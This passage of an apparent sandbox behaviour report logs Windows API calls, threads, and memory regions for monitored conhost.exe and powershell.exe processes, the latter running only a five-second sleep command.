(LangId=0x0) returned 0x409 [0239.955] CoCreateGuid (in: pguid=0x1b7ff0f8 | out: pguid=0x1b7ff0f8*(Data1=0x24518a54, Data2=0x3e5e, Data3=0x411a, Data4=([0]=0xb3, [1]=0xab, [2]=0xd0, [3]=0x89, [4]=0x7e, [5]=0x82, [6]=0xd3, [7]=0xdf))) returned 0x0 [0239.956] AmsiOpenSession () returned 0x0 [0239.956] AmsiScanString () returned 0x80070015 [0239.976] EtwEventActivityIdControl () returned 0x0 [0239.976] EtwEventActivityIdControl () returned 0x0 [0239.976] EtwEventActivityIdControl () returned 0x0 [0240.256] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x1b7fe8a0*=0x6f4, lpdwindex=0x1b7fe694 | out: lpdwindex=0x1b7fe694) returned 0x0 [0240.257] SetEvent (hEvent=0x6ec) returned 1 [0240.257] SetEvent (hEvent=0x6f4) returned 1 [0240.258] EtwEventActivityIdControl () returned 0x0 [0240.258] SetEvent (hEvent=0x6ac) returned 1 [0240.258] SetEvent (hEvent=0x6ec) returned 1 [0240.258] SetEvent (hEvent=0x6f4) returned 1 [0240.258] SetEvent (hEvent=0x698) returned 1 [0240.258] SetEvent (hEvent=0x6f8) returned 1 [0240.258] SetEvent (hEvent=0x6e0) returned 1 [0240.258] SetEvent (hEvent=0x6fc) returned 1 [0240.258] SetEvent (hEvent=0x700) returned 1 [0240.263] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7ff250*=0x574, lpdwindex=0x1b7ff024 | out: lpdwindex=0x1b7ff024) returned 0x0 [0240.418] CoGetContextToken (in: pToken=0x1b7ffb00 | out: pToken=0x1b7ffb00) returned 0x0 [0240.419] CoUninitialize () [0240.473] GenericStreamBase::Read () returned 0x0 [0240.473] GenericStreamBase::Read () returned 0x0 [0240.473] GenericStreamBase::Read () returned 0x0 Thread: id = 240 os_tid = 0x1028 Thread: id = 241 os_tid = 0x1044 Thread: id = 242 os_tid = 0x1048 Thread: id = 243 os_tid = 0x1058 [0224.893] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0224.894] CoGetContextToken (in: pToken=0x1bb3fac0 | out: pToken=0x1bb3fac0) returned 0x0 [0224.894] CObjectContext::QueryInterface () returned 0x0 [0224.894] CObjectContext::GetCurrentThreadType () returned 0x0 [0224.894] Release () returned 0x0 [0224.894] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0224.894] CoUninitialize () [0224.894] RoInitialize () returned 0x1 [0224.894] RoUninitialize () returned 0x0 Thread: id = 244 os_tid = 0xb0 Thread: id = 249 os_tid = 0x1088 Thread: id = 250 os_tid = 0x108c [0231.451] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0231.453] CoGetContextToken (in: pToken=0x1bc3fa40 | out: pToken=0x1bc3fa40) returned 0x0 [0231.453] CObjectContext::QueryInterface () returned 0x0 [0231.453] CObjectContext::GetCurrentThreadType () returned 0x0 [0231.453] Release () returned 0x0 [0231.453] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0231.453] CoUninitialize () [0231.453] RoInitialize () returned 0x1 [0231.453] RoUninitialize () returned 0x0 Thread: id = 251 os_tid = 0x1090 Process: id = "12" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x70111000" os_pid = "0xbc4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x518" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6500 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6501 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6502 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6503 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6504 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6505 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 6506 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 6507 start_va = 0x7ff7a29a0000 end_va = 0x7ff7a29b0fff monitored = 0 entry_point = 0x7ff7a29a16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6508 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6509 start_va = 0x400000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6510 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6511 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6512 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6513 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 6514 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6516 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6517 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 6518 start_va = 0x5f0000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 6519 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6520 start_va = 0x7ffb1cba0000 end_va = 0x7ffb1cbf8fff monitored = 0 entry_point = 0x7ffb1cbafbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6521 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 6522 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6523 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6524 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6525 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6526 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6527 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 6528 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6529 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6530 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6531 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6532 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6533 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6534 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6535 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 6536 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 6537 start_va = 0xa70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 6538 start_va = 0x400000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6539 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 6544 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6545 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 6546 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6547 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6548 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6549 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6550 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6551 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6552 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6553 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6554 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6555 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6556 start_va = 0x5f0000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 6557 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 6562 start_va = 0x1e70000 end_va = 0x21a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6563 start_va = 0x21b0000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 6564 start_va = 0x22b0000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 6569 start_va = 0x460000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6570 start_va = 0x7ffb28080000 end_va = 0x7ffb281d9fff monitored = 0 entry_point = 0x7ffb280c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6571 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 6572 start_va = 0x24b0000 end_va = 0x256bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 6573 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 6574 start_va = 0x7ffb229b0000 end_va = 0x7ffb229d1fff monitored = 0 entry_point = 0x7ffb229b1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6575 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6576 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6577 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6578 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 6579 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 6580 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6581 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6582 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 6583 start_va = 0x440000 end_va = 0x440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 6584 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 6585 start_va = 0x7ffb1c1d0000 end_va = 0x7ffb1c443fff monitored = 0 entry_point = 0x7ffb1c240400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 6586 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 6587 start_va = 0x4c0000 end_va = 0x4c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Thread: id = 227 os_tid = 0xdec Thread: id = 228 os_tid = 0xbb8 Thread: id = 229 os_tid = 0x748 Thread: id = 230 os_tid = 0x388 Process: id = "13" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x2ded1000" os_pid = "0x10b0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x6d8" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Sleep -s 5" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10247 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10248 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10249 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10250 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10251 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 10252 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10253 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10254 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10255 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 10256 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 10257 start_va = 0x7ff6edf60000 end_va = 0x7ff6edfd7fff monitored = 0 entry_point = 0x7ff6edf631a0 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 10258 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10259 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10260 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10261 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 10262 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 10263 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10264 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10362 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10363 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10364 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 10365 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10366 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10367 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10368 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10369 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 10370 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10371 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10372 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10373 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10374 start_va = 0x7ffb116a0000 end_va = 0x7ffb116bdfff monitored = 0 entry_point = 0x7ffb116a3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 10375 start_va = 0x7ffb1c980000 end_va = 0x7ffb1c9e7fff monitored = 1 entry_point = 0x7ffb1c984970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 10376 start_va = 0x5f0000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 10377 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10378 start_va = 0x400000 end_va = 0x438fff monitored = 0 entry_point = 0x4012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10379 start_va = 0x680000 end_va = 0x807fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 10380 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10381 start_va = 0x810000 end_va = 0x990fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 10382 start_va = 0x9a0000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 10383 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10384 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 